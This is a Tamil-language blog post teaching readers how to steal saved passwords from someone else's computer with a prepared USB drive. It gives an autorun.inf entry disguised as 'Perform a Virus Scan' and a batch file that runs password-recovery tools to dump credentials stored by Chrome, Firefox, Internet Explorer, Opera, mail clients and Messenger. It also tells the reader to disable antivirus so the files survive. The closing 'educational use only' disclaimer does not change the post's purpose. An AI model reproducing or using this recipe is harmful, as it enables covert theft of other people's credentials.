என்னிடம்
நண்பர்கள் அதிகம் கேட்பது அடுத்தவர் கணினியை எப்படி எளிதில் கொந்தல் செய்வது
என்பது பற்றியே. உண்மை நிலை என்னவெனில் கொந்தல் என்பது எளிதில் மேற்கொள்ளக்கூடியது அல்ல. இருப்பினும் சில துணை மென்பொருட்களைக் கொண்டு
எளிதில் கொந்தலில் ஈடுபடலாம். அதன் ஒரு வகை தான் இந்த பதிவு.
இம்முறையின் மூலம்
நீங்கள் எளிதில் அடுத்தவர் கணினியின் குரோம், நெருப்பு நரி உலாவி, விண்டோஸ் மெசெஞ்சர் ஆகியவற்றில் பதியப்பட்டுள்ள
கடவுச்சொற்களைக் கண்டறிந்து விடலாம். வாருங்கள் சொல்கிறேன்.
நிலை 1:
குறைந்தது 2 ஜிபி அளவுள்ள விரலியை எடுத்துக்கொள்ளுங்கள். இந்த இணைப்பில் சென்று பதிவிறக்கிக் கொள்ளுங்கள்.
நிலை 2:
பதிவிறக்கப்பட்ட கோப்பு RAR வடிவில் சுருக்கப்பட்டிருக்கும். இதனை விரிவு படுத்திக்கொள்ளுங்கள். விரிவு படுத்தப்பட்ட கோப்புகளில் exe வகைகளை மட்டும் உங்கள் விரலியில் நகலெடுத்துக்கொள்ளுங்கள்.
நிலை 3:
இப்போது புதிய Notepad ஒன்றை திறந்து கொள்ளுங்கள். அதில் பின்வரும் நிரல்களை நகலெடுத்து அதில்
ஒட்டுங்கள்.
நிரல்:
open=wos.bat
ACTION= Perform a Virus Scan
பின் இதனை autorun.inf எனப்பெயரிட்டு உங்கள் விரலியில்
சேமித்துக்கொள்ளுங்கள்.
நிலை 4:
மீண்டும் ஒரு புதிய Notepad ஒன்றைத் திறந்து கொள்ளுங்கள். இதில்கீழ்க்காணும் நிரல்களை
நகலெடுத்து அதில்
ஒட்டுங்கள்.
நிரல்:
start mspass.exe /stext Microsoft.txt
start mailpv.exe /stext Mail.txt
start iepv.exe /stext Internet Explorer.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext Firefox.txt
start ChromePass.exe /stext Chrome.txt
start OperaPassView.exe /stext Opera.txt
இப்போது இதனை
விரலியில் சேமிக்கும் போது wos.bat
என சேமியுங்கள்.
இப்போது நமது
ஆயுதம் கொந்தலுக்குத் தயாராகி விட்டது. விரலியை அடுத்தவர் கணினியில் சொருகினால் அவரின்
உலாவிகளில் பதியப்பட்டுள்ள அனைத்துக்கடவுச்சொற்களும் நமக்குக் காட்டப்படும். (குறிப்பு: அடுத்தவர் கணினி Autorunஐ இயக்க நிலையில் வைத்திருந்தால் மட்டுமே இது
தானாக கடவுச்சொற்களைக் கண்டறிந்து நமக்குக் காண்பிக்கும். இல்லையேல் நாம் தான் wos.bat என்ற நிரலைத் திறக்க வேண்டும். இதனைத் திறந்தாலே அனைத்துக் கடவுச்சொற்களும்
நமக்குக் காட்டப்படும்.)
முக்கியம் 1:
நீங்கள் மேற்குறிப்பிட்ட நிரல்களை நகலெடுத்து
ஒட்டும்போதோ அல்லது எழுதும்போதோ கண்டிப்பாக உங்கள் எதிர்க்கொல்லி மென்பொருள்
அணைத்து வைக்கப்பட்டிருக்க வேண்டும். இல்லையேல் நாம் உருவாக்கும் கோப்புகள் யாவும் அழிந்துவிடும்.
முக்கியம் 2:
இது முழுக்க
முழுக்க அறிவு சார் பயன்பாடுகளுக்கு மட்டுமே பதிவிடப்பட்டது. இதனை தவறான முறைகளில் பயன்படுத்தினால் பின்வரும்
விளைவுகளுக்கு நான் பொறுப்பல்ல.
காணொலி விளக்கம்:
தமிழறிவோம்
1. விரலி - Pen Drive
2. கடவுச்சொற்கள் - Passwords
3. கொந்தல்கள் - Hacks
4. நிரல்கள் - Programs/Software
5. கோப்பு - File
6. விரிவு படுத்தல் - Extract
7. நகலெடுத்தல் - Copy
8. ஒட்டுதல் - Paste
0 comments:
Post a Comment